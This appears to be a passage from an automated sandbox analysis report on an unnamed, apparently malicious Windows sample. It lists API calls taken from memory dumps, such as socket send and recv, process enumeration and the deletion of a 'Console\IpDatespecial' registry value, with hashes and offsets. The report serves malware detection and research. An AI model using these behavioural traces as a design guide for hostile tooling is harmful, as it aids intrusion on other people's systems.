                                                                                                                                                                      • Opcode Fuzzy Hash: c11137feeac243ddddcf5d0cd71b4ab0059f2c3ba62eeb55c2b7bd41880d4e8e
                                                                                                                                                                      • Instruction Fuzzy Hash: 3C11D7B1C00249DFDB00EFA4D589BAD7BB2FF04314F1085A9E868A7250DB399A15EF54
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 03784891
                                                                                                                                                                        • Part of subcall function 03783E5B: __getptd_noexit.LIBCMT ref: 03783E5E
                                                                                                                                                                        • Part of subcall function 03783E5B: __amsg_exit.LIBCMT ref: 03783E6B
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 037848B1
                                                                                                                                                                      • __lock.LIBCMT ref: 037848C1
                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 037848DE
                                                                                                                                                                      • _free.LIBCMT ref: 037848F1
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(03A01658), ref: 03784909
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3470314060-0
                                                                                                                                                                      • Opcode ID: c81e7dbe2b1380e14a052412eb8e1506e3245f4cd85bae099a6e90cf0dae973d
                                                                                                                                                                      • Instruction ID: d92595acb4106211ced210fe06455943ff8b0ace643545c6d7990eef2a02c72b
                                                                                                                                                                      • Opcode Fuzzy Hash: c81e7dbe2b1380e14a052412eb8e1506e3245f4cd85bae099a6e90cf0dae973d
                                                                                                                                                                      • Instruction Fuzzy Hash: 7601D635D81B53EBFB20FF26940875DB3A0BF04B10F09461AD910AB280CBB45442DBD2
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C6D9CA
                                                                                                                                                                        • Part of subcall function 02C6990F: __getptd_noexit.LIBCMT ref: 02C69912
                                                                                                                                                                        • Part of subcall function 02C6990F: __amsg_exit.LIBCMT ref: 02C6991F
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 02C6D9EA
                                                                                                                                                                      • __lock.LIBCMT ref: 02C6D9FA
                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 02C6DA17
                                                                                                                                                                      • _free.LIBCMT ref: 02C6DA2A
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(03031658), ref: 02C6DA42
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3470314060-0
                                                                                                                                                                      • Opcode ID: 203738294b941d6d9212e94a88443409c9a5dbe14f5b66766454be2c429167d4
                                                                                                                                                                      • Instruction ID: f607e6124e5a8fd8cc8969f900acf85c188b0ed843b911756848b63834733a44
                                                                                                                                                                      • Opcode Fuzzy Hash: 203738294b941d6d9212e94a88443409c9a5dbe14f5b66766454be2c429167d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 2901F572F857219BD720AF6594CC77DB362BF40710F054205D822A7280CB34A655EFD6
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C648E1
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C648EC
                                                                                                                                                                      • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 02C648F9
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C64914
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C6491D
                                                                                                                                                                      • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 02C6492E
                                                                                                                                                                        • Part of subcall function 02C63F60: GetCurrentThreadId.KERNEL32 ref: 02C63F65
                                                                                                                                                                        • Part of subcall function 02C63F60: send.WS2_32(?,02C77440,00000010,00000000), ref: 02C63FC6
                                                                                                                                                                        • Part of subcall function 02C63F60: SetEvent.KERNEL32(?), ref: 02C63FE9
                                                                                                                                                                        • Part of subcall function 02C63F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C63FF5
                                                                                                                                                                        • Part of subcall function 02C63F60: WSACloseEvent.WS2_32(?), ref: 02C64003
                                                                                                                                                                        • Part of subcall function 02C63F60: shutdown.WS2_32(?,00000001), ref: 02C6401B
                                                                                                                                                                        • Part of subcall function 02C63F60: closesocket.WS2_32(?), ref: 02C64025
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1019945655-0
                                                                                                                                                                      • Opcode ID: b991122375e3451f4354ed1a68d2ab14b491a1e5faac29fdbef1d4ecec269b5c
                                                                                                                                                                      • Instruction ID: d06a15bb676ec2425f6a6a560d1a7f2d223b2dc31b8cbbd2e999b29417f0358b
                                                                                                                                                                      • Opcode Fuzzy Hash: b991122375e3451f4354ed1a68d2ab14b491a1e5faac29fdbef1d4ecec269b5c
                                                                                                                                                                      • Instruction Fuzzy Hash: 41F090322046045BC224EBA9DCC4E4AF3E9EFC9760B204B09E26987690CA71E805CBE0
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 03779BD2
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779BE3
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779BF8
                                                                                                                                                                      • GdiplusShutdown.GDIPLUS(00000000,?,?,?,03779B7B), ref: 03779C04
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779C15
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779C1C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4268643673-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 037748E1
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 037748EC
                                                                                                                                                                      • Sleep.KERNEL32(00000258), ref: 037748F9
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03774914
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0377491D
                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 0377492E
                                                                                                                                                                        • Part of subcall function 03773F60: GetCurrentThreadId.KERNEL32 ref: 03773F65
                                                                                                                                                                        • Part of subcall function 03773F60: send.WS2_32(?,037949C0,00000010,00000000), ref: 03773FC6
                                                                                                                                                                        • Part of subcall function 03773F60: SetEvent.KERNEL32(?), ref: 03773FE9
                                                                                                                                                                        • Part of subcall function 03773F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03773FF5
                                                                                                                                                                        • Part of subcall function 03773F60: WSACloseEvent.WS2_32(?), ref: 03774003
                                                                                                                                                                        • Part of subcall function 03773F60: shutdown.WS2_32(?,00000001), ref: 0377401B
                                                                                                                                                                        • Part of subcall function 03773F60: closesocket.WS2_32(?), ref: 03774025
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
• Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1019945655-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03773311
                                                                                                                                                                      • Sleep.KERNEL32(00000258), ref: 0377331E
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 03773326
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03773332
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0377333A
                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 0377334B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
• Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3137405945-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___BuildCatchObject.LIBCMT ref: 0379096E
                                                                                                                                                                        • Part of subcall function 037908C9: ___BuildCatchObjectHelper.LIBCMT ref: 037908FF
                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 03790985
                                                                                                                                                                      • ___FrameUnwindToState.LIBCMT ref: 03790993
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
• Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 2163707966-3733052814
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___BuildCatchObject.LIBCMT ref: 02C73A63
                                                                                                                                                                        • Part of subcall function 02C739BE: ___BuildCatchObjectHelper.LIBCMT ref: 02C739F4
                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 02C73A7A
                                                                                                                                                                      • ___FrameUnwindToState.LIBCMT ref: 02C73A88
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
• Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 2163707966-3733052814
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0377B800
                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0377B810
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0377B81B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
• Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                                                                                      • String ID: Console$IpDatespecial
                                                                                                                                                                      • API String ID: 849931509-1840232981
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,A0516FA3), ref: 0377B9DA
                                                                                                                                                                      • _memset.LIBCMT ref: 0377B9FB
                                                                                                                                                                      • _memset.LIBCMT ref: 0377BA4B
                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0377BA65
                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0377BAB7
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
• Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2416807333-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • recv.WS2_32(?,?,00000598,00000000), ref: 03773CBF
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,0377399F,?,?,00000000,000000FF,00000000), ref: 03773CFA
                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 03773D45
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,0377399F,?,?,00000000,000000FF,00000000), ref: 03773D7B
                                                                                                                                                                      • WSASetLastError.WS2_32(0000000D,?,?,0377399F,?,?,00000000,000000FF,00000000), ref: 03773DA2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
• Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$recv
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 316788870-0
                                                                                                                                                                      • Opcode ID: bdbea695817fed8ddf9f25515e1eb11ba49a708f4ccc95a62241970b24128caf
                                                                                                                                                                      • Instruction ID: 1a63dda92c0de5fa6fc990b5e857751883bed34417d3b1a38497ee2e9ff8fdbc
                                                                                                                                                                      • Opcode Fuzzy Hash: bdbea695817fed8ddf9f25515e1eb11ba49a708f4ccc95a62241970b24128caf
                                                                                                                                                                      • Instruction Fuzzy Hash: FD31047A6042009FFF24EF68D8C8B6977A9FB45320F140267ED09DB28AD731D8819AD1
                                                                                                                                                                      APIs
                                                                                                                                                                      • recv.WS2_32(?,?,00000598,00000000), ref: 02C63CBF
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,02C6399F,?,?,00000000,000000FF,00000000), ref: 02C63CFA
                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 02C63D45
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,02C6399F,?,?,00000000,000000FF,00000000), ref: 02C63D7B
                                                                                                                                                                      • WSASetLastError.WS2_32(0000000D,?,?,02C6399F,?,?,00000000,000000FF,00000000), ref: 02C63DA2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$recv
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 316788870-0
                                                                                                                                                                      • Opcode ID: 7b82938a0c16c7b04a6ace53f3cf30b30904dfb0ecb31bff336cd243d240c5bf
                                                                                                                                                                      • Instruction ID: 84f2283b3b2adc0bfd1690c15f73e61de90c3df7ba5669cbe614ec153efecdfd
                                                                                                                                                                      • Opcode Fuzzy Hash: 7b82938a0c16c7b04a6ace53f3cf30b30904dfb0ecb31bff336cd243d240c5bf
                                                                                                                                                                      • Instruction Fuzzy Hash: 08312972A142409FEB249F28D8CCB79376AFB85724F5006A6FE05CF285D771D884CB91
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 03780EF9
                                                                                                                                                                        • Part of subcall function 0377F673: __FF_MSGBANNER.LIBCMT ref: 0377F68C
                                                                                                                                                                        • Part of subcall function 0377F673: __NMSG_WRITE.LIBCMT ref: 0377F693
                                                                                                                                                                        • Part of subcall function 0377F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 0377F6B8
                                                                                                                                                                      • _free.LIBCMT ref: 03780F0C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1020059152-0
                                                                                                                                                                      • Opcode ID: a2659ee491ecd8da7bfca0ff9d550238bcd63b9d7d2a4efbc330dfec365cbfdc
                                                                                                                                                                      • Instruction ID: b2b8ce2e6f1140c67ee8ad1983d8e62a4c6317c116d6b3431b33fe75a7797e53
                                                                                                                                                                      • Opcode Fuzzy Hash: a2659ee491ecd8da7bfca0ff9d550238bcd63b9d7d2a4efbc330dfec365cbfdc
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B112336488B19FECF22FF74A808A5A37999F412A0B14C526F859DF150DB3484458B90
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 02C6E5E5
                                                                                                                                                                        • Part of subcall function 02C66E83: __FF_MSGBANNER.LIBCMT ref: 02C66E9C
                                                                                                                                                                        • Part of subcall function 02C66E83: __NMSG_WRITE.LIBCMT ref: 02C66EA3
                                                                                                                                                                        • Part of subcall function 02C66E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F), ref: 02C66EC8
                                                                                                                                                                      • _free.LIBCMT ref: 02C6E5F8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1020059152-0
                                                                                                                                                                      • Opcode ID: 011b9d5b009cd2c36ca38d3ccfb000c3b16e6ac8df6a92c9f526d2a5aa1c0dac
                                                                                                                                                                      • Instruction ID: fe287889cd500d927fe3ad4fefbba9aa44a87d31604627d557734af81c57222a
                                                                                                                                                                      • Opcode Fuzzy Hash: 011b9d5b009cd2c36ca38d3ccfb000c3b16e6ac8df6a92c9f526d2a5aa1c0dac
                                                                                                                                                                      • Instruction Fuzzy Hash: E711E936944618ABCB222F74AC8CF7E3796EF803A4B204927F8599B141EF34C9549F94
                                                                                                                                                                      APIs
                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 03772C3F
                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 03772C55
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 03772C64
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 03772C6A
                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 03772C78
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2015114452-0
                                                                                                                                                                      • Opcode ID: ee7045a5b7baa79b2ebae534df70173a444b8d507c42b5a6778bbcdb2d78a009
                                                                                                                                                                      • Instruction ID: d84d9d35c29c7b31b45b01e8b3a37d22f2fc8ada44efda793502893ce8fc863b
                                                                                                                                                                      • Opcode Fuzzy Hash: ee7045a5b7baa79b2ebae534df70173a444b8d507c42b5a6778bbcdb2d78a009
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D018672A5430DB6FB10E7949C81FFA73ACEB14B10F504A12FB10EA0C6DAA5A40187A9
                                                                                                                                                                      APIs
                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 02C62BFF
                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 02C62C15
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 02C62C24
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 02C62C2A
                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02C62C38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2015114452-0
                                                                                                                                                                      • Opcode ID: d43c4ad9a0578be41ae760cffe878e55fc7441c6041b94c46f6c0cc46af465b9
                                                                                                                                                                      • Instruction ID: 0f2de76a8d49b36aa74bd30038605dd40bab090c328b2e4b21dbdc90ba63b239
                                                                                                                                                                      • Opcode Fuzzy Hash: d43c4ad9a0578be41ae760cffe878e55fc7441c6041b94c46f6c0cc46af465b9
                                                                                                                                                                      • Instruction Fuzzy Hash: 6501F972E8030977F7209AA59C85FBA776CEB44B50F504A11FF05EA0C4DBA0E40487B5
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03774B83
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03774B8D
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03774BA0
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03774BA3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                      • Opcode ID: bfe7eba7488538b6a20ce25de4375fb248b06f2d25798f535c60123f5988ac8d
                                                                                                                                                                      • Instruction ID: 0105d52a3dd0fdbd5626c6d9b560b2bbede03f246c8df421fcfe92ccbd4d66d6
                                                                                                                                                                      • Opcode Fuzzy Hash: bfe7eba7488538b6a20ce25de4375fb248b06f2d25798f535c60123f5988ac8d
